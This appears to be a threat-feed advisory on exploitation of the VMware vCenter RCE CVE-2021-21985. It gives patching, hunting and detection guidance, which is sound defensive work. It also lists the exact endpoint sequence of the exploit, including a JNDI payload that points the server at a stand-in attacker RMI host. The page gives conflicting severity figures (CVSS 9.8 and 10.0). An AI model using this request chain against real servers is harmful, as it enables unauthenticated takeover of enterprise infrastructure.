Skip to content
Threat Feed
high advisory

Exploitation of CVE-2021-21985 in VMware vCenter Server

Public proof-of-concept exploits for CVE-2021-21985 have been released, enabling unauthenticated remote code execution in VMware vCenter Server via the Virtual SAN Health Check plug-in.

CVE search metadata

CVE search record: CVE-2021-21985. Severity: critical. CVSS: 9.8. EPSS: 100.00%. KEV: no. Product: vCenter Server (6.5, 6.7, 7.0). Brief: Exploitation of CVE-2021-21985 in VMware vCenter Server. Brief link: https://feed.craftedsignal.io/briefs/2026-10-cve-2021-21985-vcenter-rce/

CVE-2021-21985 is a critical remote code execution (RCE) vulnerability affecting the vSphere Client (HTML5) in VMware vCenter Server versions 6.5, 6.7, and 7.0. The vulnerability is caused by an input validation flaw within the Virtual SAN Health Check plug-in, which is enabled by default. As of October 2026, multiple proof-of-concept (PoC) exploits have been published on security platforms, significantly lowering the barrier for exploitation. An unauthenticated attacker can send specially crafted HTTP POST requests to the vCenter server to trigger arbitrary code execution via JNDI lookup or other VMODL helper operations. This vulnerability is highly dangerous due to its remote, unauthenticated nature and CVSS score of 10.0, allowing complete system compromise.

Attack Chain

  1. The attacker performs initial reconnaissance to identify internet-facing vCenter instances.
  2. The attacker sends an HTTP POST request to '/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetObject' to set the target object to null.
  3. The attacker sends a request to '/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod' with 'javax.naming.InitialContext.doLookup' as the payload.
  4. The attacker configures the target method by sending a POST request to '/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod' with 'doLookup'.
  5. The attacker specifies the JNDI payload, such as 'rmi://attacker-controlled-server:9090/resource', via a POST request to '/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments'.
  6. The attacker initializes the helper class by sending a POST request to the 'prepare' endpoint.
  7. The attacker triggers the final payload execution by sending a POST request to the 'invoke' endpoint.
  8. The vCenter server initiates an outbound connection to the attacker's infrastructure, resulting in code execution or data exfiltration.

Impact

Successful exploitation allows an unauthenticated remote attacker to gain full control over the vCenter Server. This impact includes complete loss of confidentiality, integrity, and availability for the vCenter instance and all virtual machines managed by it. Given the prevalence of vCenter in enterprise environments, successful exploitation could facilitate widespread ransomware distribution or persistent lateral movement within an organization's internal network.

Recommendation

Prioritized, concrete actions for detection engineering teams:

  • Patch all instances of VMware vCenter Server to the latest version as recommended in VMSA-2021-0010.
  • Deploy the Sigma rule below to monitor for unauthorized usage of the 'vsanProviderUtils_setVmodlHelper' service.
  • Monitor firewall and proxy logs for unusual outbound connections originating from vCenter Servers, specifically RMI or LDAP traffic (TCP/9090 or others).
  • Enable detailed logging for the vSphere Client ('/var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log') and audit for the specific endpoints described in the attack chain.

Immediate actions

Patch all vulnerable vCenter Server instances to the version specified in VMSA-2021-0010.

IT Operations 24h

Threat Hunt

Search web logs for POST requests to /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/

T1190 high high confidence hunt now

Data: webserver access logs

Mitigations

Patch VMware vCenter Server

immediate IT Operations

CVE-2021-21985

Detection coverage 1

Detect CVE-2021-21985 Exploitation Attempts

high

Detects HTTP POST requests targeting the VsanCapabilityProvider or VmodlHelper services indicative of CVE-2021-21985 exploitation attempts

sigma tactics: initial_access techniques: T1190 sources: webserver

Detection queries are available on the platform. Get full rules →